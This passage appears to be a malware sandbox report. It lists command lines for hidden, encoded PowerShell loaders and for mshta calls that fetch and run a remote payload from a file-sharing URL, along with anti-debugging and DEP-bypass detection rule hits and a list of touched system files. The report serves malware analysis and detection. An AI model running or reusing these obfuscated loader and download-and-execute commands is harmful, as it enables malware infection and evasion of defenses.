QAyAEMAMwAxADMANgAzADMAMgBDADMAMQAzADYAMwAzADIAQwAzADEAMwA2ADMAMwAyAEMAMwA5ADMAMAAyAEMAMwA5ADMANgAyAEMAMwAxADMANQAzADkAMgBDADMAMQAzADYAMwA1ADIAQwAzADEAMwA1ADMANAAyAEMAMwAxADMANAAzADMAMgBDADMAOQAzADAAMgBDADMAMQAzADQAMwAzADIAQwAzADEAMwA1ADMANQAyAEMAMwAxADMANQAzADMAMgBDADMAOQAzADEAMgBDADMAMQAzADUAMwA5ADIAQwAzADkAMwAxADIAQwAzADEAMwA0ADMANgAyAEMAMwAxADMAMwAzADkAMgBDADMAMQAzADYAMwAxADIAQwAzADgAMwA5ADIAQwAzADkAMwA5ADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMAMgAzADEAMgBDADMAMQAzADUAMwA2ADIAQwAzADEAMwAyADMAMgAyAEMAMwA5ADMAMQAyAEMAMwAxADMANgAzADAAMgBDADMAMQAzADYAMwAwADIAQwAzADkAMwAwADIAQwAzADEAMwA0ADMANQAyAEMAMwAxADMANgAzADQAMgBDADMAMQAzADQAMwA1ADIAOQAyADkAMwBCADcANwA0ADcANwA3ADIAMAAyADQANABCADQAOAA2ADMANQA5ADQAMwA2AEUANQA1ADUAOAA3ADkANgA5ADUAMgA1AEEANgBBADQAQQAyADAAMgA0ADYANQA0ADIANQAwADcANwA2ADUANgBEADQAQwA3ADUANQAyADcAMQA1ADcANwAxADUANQA3ADcANwAxADMAQgA1ADAANgA2ADUANgAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEANwBEADMAQgAzAEIAMwBCADcARAA2ADcANgAyADUAOAAzAEIAJwA7ACQAYgBUAEEAPQAnACcAOwAgAGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbAB0ACAAJABhAHEAVgAuAEwAZQBuAGcAdABoADsAJABpACsAPQAyACkAewAkAGIAVABBACsAPQBbAGMAaABhAHIAXQAoAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8ASQBuAHQAMwAyACgAJABhAHEAVgAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAMgApACwAMQA2ACkAKQB9ADsAIAAmACAAKAAgACQAYgBUAEEAWwAwAC4ALgAyAF0AIAAtAGoAbwBpAG4AIAAnACcAIAApACAAKAAgACQAYgBUAEEAWwAzAC4ALgAoACQAYgBUAEEALgBMAGUAbgBnAHQAaAAtADEAKQBdACAALQBqAG8AaQBuACAAJwAnACAAKQA= |
cmdline | "C:\Windows\System32\cmd.exe" /c powershell.exe -w h -nop -ep un -E JABhAHEAVgAgAD0AIAAnADYAOQA2ADUANwA4ADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADcANwA0ADcANwA3ADIAOAAyADQANwAzADUAOQA3ADAAMgBDADIAMAAyADQANQA5ADYARgA0AEMAMgA5ADcAQgA3ADMANgAzADIAMAAyADQANwAzADUAOQA3ADAAMgAwADIANAA1ADkANgBGADQAQwAyADAAMgBEADQANQA2AEUANgAzADYARgA2ADQANgA5ADYARQA2ADcAMgAwADQAMgA3ADkANwA0ADYANQA3AEQAMwBCADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADUAMAA2ADYANQA2ADIAOAAyADQANwAzADUAOQA3ADAAMgA5ADcAQgA3ADMANwA0ADYAMQA3ADIANwA0ADIAMAAyADQANwAzADUAOQA3ADAAMgAwADcARAAzAEIANgA2ADcANQA2AEUANgAzADcANAA2ADkANgBGADYARQAyADAANgA3ADQANgA1ADcAMgA4ADIANAA2ADEANwAxADUANgAyADkANwBCADIANAA2ADIANQA0ADQAMQAyADAAMwBEADIAMAA0AEUANgA1ADcANwAyAEQANABGADYAMgA2AEEANgA1ADYAMwA3ADQAMgAwADIAOAA2ADUANgBEADYAQgAyADAANAAwADIAOAAzADEAMwAyADMAMgAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADYAMwAwADIAQwAzADkAMwAwADIAQwAzADEAMwAzADMAMQAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADQAMwAyADIAQwAzADEAMwAxADMAMQAyAEMAMwAxADMANQAzADIAMgBDADMAMQAzADQAMwA5ADIAQwAzADEAMwA0ADMANQAyAEMAMwAxADMANQAzADQAMgBDADMAMQAzADYAMwAwADIAOQAyADkAMwBCADIANAA1ADkANgBGADQAQwAyADAAMwBEADIAMAAyADQANgAyADUANAA0ADEAMgBFADQANAA2AEYANwA3ADYARQA2AEMANgBGADYAMQA2ADQANAA0ADYAMQA3ADQANgAxADIAOAAyADQANgAxADcAMQA1ADYAMgA5ADMAQgA3ADIANgA1ADcANAA3ADUANwAyADYARQAyADAAMgA0ADUAOQA2AEYANABDADcARAAzAEIANgA2ADcANQA2AEUANgAzADcANAA2ADkANgBGADYARQAyADAANgA1ADYARAA2AEIAMgA4ADIANAA0ADEANQA2ADYAQgAyADkANwBCADIAOAAyADQANAAxADUANgA2AEIAMgAwADcAQwAyADUANwBCADIAMAA1AEIANgAzADYAOAA2ADEANwAyADUARAAyADgAMgA0ADUARgAyADAAMgBEADIAMAAzADQAMwA0ADIAOQAyADAANwBEADIAOQAyADAAMgBEADYAQQA2AEYANgA5ADYARQAyADAAMgA3ADIANwA3AEQAMwBCADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADYANwA2ADIANQA4ADIAOAAyADkANwBCADIANAA0ADcANQA4ADcAMwAyADAAMwBEADIAMAAyADQANgA1ADYARQA3ADYAMwBBADQAMQA3ADAANwAwADQANAA2ADEANwA0ADYAMQAyADAAMgBCADIAMAAyADcANQBDADIANwAzAEIAMgA0ADcAOQA2ADYANgBDADMARAAyADAAMgA0ADYANQA2AEUANwA2ADMAQQA0ADEANwAwADcAMAA0ADQANgAxADcANAA2ADEAMwBCADIANAA0ADgANgBCADYAQQAyADAAMwBEADIAMAAyADQANwA5ADYANgA2AEMAMgAwADIAQgAyADAAMgA3ADUAQwA3ADMANgAxADYARAA3ADAANgBDADYANQAyAEUANwAwADYANAA2ADYAMgA3ADMAQgA0ADkANgA2ADIAOAA1ADQANgA1ADcAMwA3ADQAMgBEADUAMAA2ADEANwA0ADYAOAAyADAAMgA0ADQAOAA2AEIANgBBADIAOQA3AEIANgA5ADYAOQAyADAAMgA0ADQAOAA2AEIANgBBADMAQgA3AEQANAA1ADYAQwA3ADMANgA1ADcAQgAyADAAMgA0ADcAOAA3AEEANQA5ADIAMAAzAEQAMgAwADYANwA0ADYANQA3ADIAMAAyADgANgA1ADYARAA2AEIAMgAwADQAMAAyADgAMwAxADMANAAzADgAMgBDADMAMQAzADYAMwAwADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwA5ADIAQwAzADEAMwAwADMAMgAyAEMAMwA5ADMAMQAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyAEMAMwAxADMANQAzADUAMgBDADMAMQAzADQAMwAyADIAQwAzADEAMwA1ADMAMAAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADQAMwAzADIAQwAzADEAMwA2ADMAMAAyAEMAMwA5ADMAMAAyAEMAMwAxADMANAAzADMAMgBDADMAMQAzADUAMwA1ADIAQwAzADEAMwA1ADMAMwAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADkAMgBDADMAMQAzADQAMwAxADIAQwAzADEAMwA1ADMAMwAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwAyADIAQwAzADEAMwA0ADMANQAyAEMAMwA5ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyADkAMgA5ADMAQgA3ADcANAA3ADcANwAyADAAMgA0ADQAOAA2AEIANgBBADIAMAAyADQANwA4ADcAQQA1ADkAMwBCADYAOQA2ADkAMgAwADIANAA0ADgANgBCADYAQQAzAEIANwBEADMAQgAzAEIAMwBCADIANAA0AEIANAA4ADYAMwA1ADkANAAzADYARQA1ADUANQA4ADcAOQA2ADkANQAyADUAQQA2AEEANABBADIAMAAzAEQAMgAwADIANAA0ADcANQA4ADcAMwAyADAAMgBCADIAMAAyADcANwA0ADcANAAyAEUANgA1ADcAOAA2ADUAMgA3ADMAQgA2ADkANgA2ADIAOAA1ADQANgA1ADcAMwA3ADQAMgBEADUAMAA2ADEANwA0ADYAOAAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEAMgA5ADcAQgA1ADAANgA2ADUANgAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEANwBEADQANQA2AEMANwAzADYANQA3AEIAMgA0ADYANQA0ADIANQAwADcANwA2ADUANgBEADQAQwA3ADUANQAyADcAMQA1ADcANwAxADUANQA3ADcANwAxADMARAA2ADcANAA2ADUANwAyADgANgA1ADYARAA2AEIAMgAwADQAMAAyADgAMwAxADMANAAzADgAMgBDADMAMQAzADYAMwAwADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwA5ADIAQwAzADEAMwAwADMAMgAyAEMAMwA5ADMAMQAyAEMAMwA5ADMAMQAyAEMAMwAxADMANgAzADMAMgBDADMAMQAzADYAMwAzADIAQwAzADEAMwA2ADMAMwAyAEMAMwA5ADMAMAAyAEMAMwA5ADMANgAyAEMAMwAxADMANQAzADkAMgBDADMAMQAzADYAMwA1ADIAQwAzADEAMwA1ADMANAAyAEMAMwAxADMANAAzADMAMgBDADMAOQAzADAAMgBDADMAMQAzADQAMwAzADIAQwAzADEAMwA1ADMANQAyAEMAMwAxADMANQAzADMAMgBDADMAOQAzADEAMgBDADMAMQAzADUAMwA5ADIAQwAzADkAMwAxADIAQwAzADEAMwA0ADMANgAyAEMAMwAxADMAMwAzADkAMgBDADMAMQAzADYAMwAxADIAQwAzADgAMwA5ADIAQwAzADkAMwA5ADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMAMgAzADEAMgBDADMAMQAzADUAMwA2ADIAQwAzADEAMwAyADMAMgAyAEMAMwA5ADMAMQAyAEMAMwAxADMANgAzADAAMgBDADMAMQAzADYAMwAwADIAQwAzADkAMwAwADIAQwAzADEAMwA0ADMANQAyAEMAMwAxADMANgAzADQAMgBDADMAMQAzADQAMwA1ADIAOQAyADkAMwBCADcANwA0ADcANwA3ADIAMAAyADQANABCADQAOAA2ADMANQA5ADQAMwA2AEUANQA1ADUAOAA3ADkANgA5ADUAMgA1AEEANgBBADQAQQAyADAAMgA0ADYANQA0ADIANQAwADcANwA2ADUANgBEADQAQwA3ADUANQAyADcAMQA1ADcANwAxADUANQA3ADcANwAxADMAQgA1ADAANgA2ADUANgAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEANwBEADMAQgAzAEIAMwBCADcARAA2ADcANgAyADUAOAAzAEIAJwA7ACQAYgBUAEEAPQAnACcAOwAgAGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbAB0ACAAJABhAHEAVgAuAEwAZQBuAGcAdABoADsAJABpACsAPQAyACkAewAkAGIAVABBACsAPQBbAGMAaABhAHIAXQAoAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8ASQBuAHQAMwAyACgAJABhAHEAVgAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAMgApACwAMQA2ACkAKQB9ADsAIAAmACAAKAAgACQAYgBUAEEAWwAwAC4ALgAyAF0AIAAtAGoAbwBpAG4AIAAnACcAIAApACAAKAAgACQAYgBUAEEAWwAzAC4ALgAoACQAYgBUAEEALgBMAGUAbgBnAHQAaAAtADEAKQBdACAALQBqAG8AaQBuACAAJwAnACAAKQA= |
cmdline | "C:\Windows\System32\mshta.exe" https://www.4sync.com/web/directDownload/gPp9O6FS/LO8xSpi2.e58d1db51e9c61f9e939f307fb0c0d77 |
cmdline | cmd.exe /c powershell.exe -w h -nop -ep un -E JABhAHEAVgAgAD0AIAAnADYAOQA2ADUANwA4ADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADcANwA0ADcANwA3ADIAOAAyADQANwAzADUAOQA3ADAAMgBDADIAMAAyADQANQA5ADYARgA0AEMAMgA5ADcAQgA3ADMANgAzADIAMAAyADQANwAzADUAOQA3ADAAMgAwADIANAA1ADkANgBGADQAQwAyADAAMgBEADQANQA2AEUANgAzADYARgA2ADQANgA5ADYARQA2ADcAMgAwADQAMgA3ADkANwA0ADYANQA3AEQAMwBCADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADUAMAA2ADYANQA2ADIAOAAyADQANwAzADUAOQA3ADAAMgA5ADcAQgA3ADMANwA0ADYAMQA3ADIANwA0ADIAMAAyADQANwAzADUAOQA3ADAAMgAwADcARAAzAEIANgA2ADcANQA2AEUANgAzADcANAA2ADkANgBGADYARQAyADAANgA3ADQANgA1ADcAMgA4ADIANAA2ADEANwAxADUANgAyADkANwBCADIANAA2ADIANQA0ADQAMQAyADAAMwBEADIAMAA0AEUANgA1ADcANwAyAEQANABGADYAMgA2AEEANgA1ADYAMwA3ADQAMgAwADIAOAA2ADUANgBEADYAQgAyADAANAAwADIAOAAzADEAMwAyADMAMgAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADYAMwAwADIAQwAzADkAMwAwADIAQwAzADEAMwAzADMAMQAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADQAMwAyADIAQwAzADEAMwAxADMAMQAyAEMAMwAxADMANQAzADIAMgBDADMAMQAzADQAMwA5ADIAQwAzADEAMwA0ADMANQAyAEMAMwAxADMANQAzADQAMgBDADMAMQAzADYAMwAwADIAOQAyADkAMwBCADIANAA1ADkANgBGADQAQwAyADAAMwBEADIAMAAyADQANgAyADUANAA0ADEAMgBFADQANAA2AEYANwA3ADYARQA2AEMANgBGADYAMQA2ADQANAA0ADYAMQA3ADQANgAxADIAOAAyADQANgAxADcAMQA1ADYAMgA5ADMAQgA3ADIANgA1ADcANAA3ADUANwAyADYARQAyADAAMgA0ADUAOQA2AEYANABDADcARAAzAEIANgA2ADcANQA2AEUANgAzADcANAA2ADkANgBGADYARQAyADAANgA1ADYARAA2AEIAMgA4ADIANAA0ADEANQA2ADYAQgAyADkANwBCADIAOAAyADQANAAxADUANgA2AEIAMgAwADcAQwAyADUANwBCADIAMAA1AEIANgAzADYAOAA2ADEANwAyADUARAAyADgAMgA0ADUARgAyADAAMgBEADIAMAAzADQAMwA0ADIAOQAyADAANwBEADIAOQAyADAAMgBEADYAQQA2AEYANgA5ADYARQAyADAAMgA3ADIANwA3AEQAMwBCADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADYANwA2ADIANQA4ADIAOAAyADkANwBCADIANAA0ADcANQA4ADcAMwAyADAAMwBEADIAMAAyADQANgA1ADYARQA3ADYAMwBBADQAMQA3ADAANwAwADQANAA2ADEANwA0ADYAMQAyADAAMgBCADIAMAAyADcANQBDADIANwAzAEIAMgA0ADcAOQA2ADYANgBDADMARAAyADAAMgA0ADYANQA2AEUANwA2ADMAQQA0ADEANwAwADcAMAA0ADQANgAxADcANAA2ADEAMwBCADIANAA0ADgANgBCADYAQQAyADAAMwBEADIAMAAyADQANwA5ADYANgA2AEMAMgAwADIAQgAyADAAMgA3ADUAQwA3ADMANgAxADYARAA3ADAANgBDADYANQAyAEUANwAwADYANAA2ADYAMgA3ADMAQgA0ADkANgA2ADIAOAA1ADQANgA1ADcAMwA3ADQAMgBEADUAMAA2ADEANwA0ADYAOAAyADAAMgA0ADQAOAA2AEIANgBBADIAOQA3AEIANgA5ADYAOQAyADAAMgA0ADQAOAA2AEIANgBBADMAQgA3AEQANAA1ADYAQwA3ADMANgA1ADcAQgAyADAAMgA0ADcAOAA3AEEANQA5ADIAMAAzAEQAMgAwADYANwA0ADYANQA3ADIAMAAyADgANgA1ADYARAA2AEIAMgAwADQAMAAyADgAMwAxADMANAAzADgAMgBDADMAMQAzADYAMwAwADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwA5ADIAQwAzADEAMwAwADMAMgAyAEMAMwA5ADMAMQAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyAEMAMwAxADMANQAzADUAMgBDADMAMQAzADQAMwAyADIAQwAzADEAMwA1ADMAMAAyAEMAMwAxADMANAAzADUAMgBDADMAMQAzADQAMwAzADIAQwAzADEAMwA2ADMAMAAyAEMAMwA5ADMAMAAyAEMAMwAxADMANAAzADMAMgBDADMAMQAzADUAMwA1ADIAQwAzADEAMwA1ADMAMwAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyAEMAMwA5ADMAMQAyAEMAMwAxADMANQAzADkAMgBDADMAMQAzADQAMwAxADIAQwAzADEAMwA1ADMAMwAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwAyADIAQwAzADEAMwA0ADMANQAyAEMAMwA5ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADQAMwA0ADIAQwAzADEAMwA0ADMANgAyADkAMgA5ADMAQgA3ADcANAA3ADcANwAyADAAMgA0ADQAOAA2AEIANgBBADIAMAAyADQANwA4ADcAQQA1ADkAMwBCADYAOQA2ADkAMgAwADIANAA0ADgANgBCADYAQQAzAEIANwBEADMAQgAzAEIAMwBCADIANAA0AEIANAA4ADYAMwA1ADkANAAzADYARQA1ADUANQA4ADcAOQA2ADkANQAyADUAQQA2AEEANABBADIAMAAzAEQAMgAwADIANAA0ADcANQA4ADcAMwAyADAAMgBCADIAMAAyADcANwA0ADcANAAyAEUANgA1ADcAOAA2ADUAMgA3ADMAQgA2ADkANgA2ADIAOAA1ADQANgA1ADcAMwA3ADQAMgBEADUAMAA2ADEANwA0ADYAOAAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEAMgA5ADcAQgA1ADAANgA2ADUANgAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEANwBEADQANQA2AEMANwAzADYANQA3AEIAMgA0ADYANQA0ADIANQAwADcANwA2ADUANgBEADQAQwA3ADUANQAyADcAMQA1ADcANwAxADUANQA3ADcANwAxADMARAA2ADcANAA2ADUANwAyADgANgA1ADYARAA2AEIAMgAwADQAMAAyADgAMwAxADMANAAzADgAMgBDADMAMQAzADYAMwAwADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMANQAzADYAMgBDADMAMQAzADUAMwA5ADIAQwAzADEAMwAwADMAMgAyAEMAMwA5ADMAMQAyAEMAMwA5ADMAMQAyAEMAMwAxADMANgAzADMAMgBDADMAMQAzADYAMwAzADIAQwAzADEAMwA2ADMAMwAyAEMAMwA5ADMAMAAyAEMAMwA5ADMANgAyAEMAMwAxADMANQAzADkAMgBDADMAMQAzADYAMwA1ADIAQwAzADEAMwA1ADMANAAyAEMAMwAxADMANAAzADMAMgBDADMAOQAzADAAMgBDADMAMQAzADQAMwAzADIAQwAzADEAMwA1ADMANQAyAEMAMwAxADMANQAzADMAMgBDADMAOQAzADEAMgBDADMAMQAzADUAMwA5ADIAQwAzADkAMwAxADIAQwAzADEAMwA0ADMANgAyAEMAMwAxADMAMwAzADkAMgBDADMAMQAzADYAMwAxADIAQwAzADgAMwA5ADIAQwAzADkAMwA5ADIAQwAzADEAMwA2ADMAMAAyAEMAMwAxADMAMgAzADEAMgBDADMAMQAzADUAMwA2ADIAQwAzADEAMwAyADMAMgAyAEMAMwA5ADMAMQAyAEMAMwAxADMANgAzADAAMgBDADMAMQAzADYAMwAwADIAQwAzADkAMwAwADIAQwAzADEAMwA0ADMANQAyAEMAMwAxADMANgAzADQAMgBDADMAMQAzADQAMwA1ADIAOQAyADkAMwBCADcANwA0ADcANwA3ADIAMAAyADQANABCADQAOAA2ADMANQA5ADQAMwA2AEUANQA1ADUAOAA3ADkANgA5ADUAMgA1AEEANgBBADQAQQAyADAAMgA0ADYANQA0ADIANQAwADcANwA2ADUANgBEADQAQwA3ADUANQAyADcAMQA1ADcANwAxADUANQA3ADcANwAxADMAQgA1ADAANgA2ADUANgAyADAAMgA0ADQAQgA0ADgANgAzADUAOQA0ADMANgBFADUANQA1ADgANwA5ADYAOQA1ADIANQBBADYAQQA0AEEANwBEADMAQgAzAEIAMwBCADcARAA2ADcANgAyADUAOAAzAEIAJwA7ACQAYgBUAEEAPQAnACcAOwAgAGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbAB0ACAAJABhAHEAVgAuAEwAZQBuAGcAdABoADsAJABpACsAPQAyACkAewAkAGIAVABBACsAPQBbAGMAaABhAHIAXQAoAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8ASQBuAHQAMwAyACgAJABhAHEAVgAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAMgApACwAMQA2ACkAKQB9ADsAIAAmACAAKAAgACQAYgBUAEEAWwAwAC4ALgAyAF0AIAAtAGoAbwBpAG4AIAAnACcAIAApACAAKAAgACQAYgBUAEEAWwAzAC4ALgAoACQAYgBUAEEALgBMAGUAbgBnAHQAaAAtADEAKQBdACAALQBqAG8AaQBuACAAJwAnACAAKQA= |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object -ComObject Shell.Application).ShellExecute('mshta', 'https://www.4sync.com/web/directDownload/gPp9O6FS/LO8xSpi2.e58d1db51e9c61f9e939f307fb0c0d77') |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\pupa[1] |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob |
parent_process | powershell.exe | martian_process | mshta https://www.4sync.com/web/directDownload/gPp9O6FS/LO8xSpi2.e58d1db51e9c61f9e939f307fb0c0d77 | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\System32\mshta.exe" https://www.4sync.com/web/directDownload/gPp9O6FS/LO8xSpi2.e58d1db51e9c61f9e939f307fb0c0d77 |
option | -nop | value | Does not load current user profile | ||||||
option | -nop | value | Does not load current user profile | ||||||
option | -nop | value | Does not load current user profile |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
file | C:\Windows\System32\mshta.exe |